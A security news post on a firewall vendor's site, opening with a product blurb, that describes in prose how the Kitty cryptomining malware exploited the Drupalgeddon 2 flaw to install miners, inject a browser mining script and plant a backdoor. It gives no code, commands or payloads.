Kitty cryptomining malware.

walden, system, systems, walden systems, rita, firewall, port, forward, up, protect, intrusion, security, traffic, DMZ, block, protection, walden systems, walden, systems, network, fire, wall, hack, intrusion, cisco, router, network, switch, hub, IoT, traffic
Rita gives you full control of what sites your employees visit. Rita can block sites that eat up your precious bandwidth such as media streaming sites. Rita enables you full control of what sites your employees can and cannot visit. Rita gives you the ability to block undesirable sites by wildcard or by name. Rita gives you the ability to determine which computers will be blocked and which will be allowed. With Rita, you can block access to sensitive servers within your LAN.



     Kitty cryptomining malware takes advantage of the critical remote code execution vulnerability in Drupal to target servers and browsers according to researchers . The hackers install a mining program called kkworker on servers to mine the xmrig Monero cryptocurrency. The attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They do this by adding the malicious JavasSript me0w.js to the commonly used index.php file, cashing in on the processor of future visitors to the infected web server site. The hackers behind Kitty have uses open source mining software for browsers called webminerpool to first write a bash script in the form of a PHP file called kdrupal.php, on a server drive. The hackers reinforce their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability.

     Researchers state that the PHP backdoor can use the sha512 hash function to protect the attackerss remote authentication. Once this backdoor is established, a time based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re infect the server and quickly push updates to the infected servers under their control. Researchers state the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS. It seems that the hackers have updated the malware after every change in its code. The first generation of the Kitty malware discovered was version 1.5, and the latest version is 1.6. This indicates an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.




     Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6,7, and 8 of Drupal's CMS platform, allows hackers to exploit multiple attack methods on a Drupal site, which could result in the site being completely compromised. Drupal warned that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up to take advantage of it. That includes a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via infected systems. More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote code execution bug.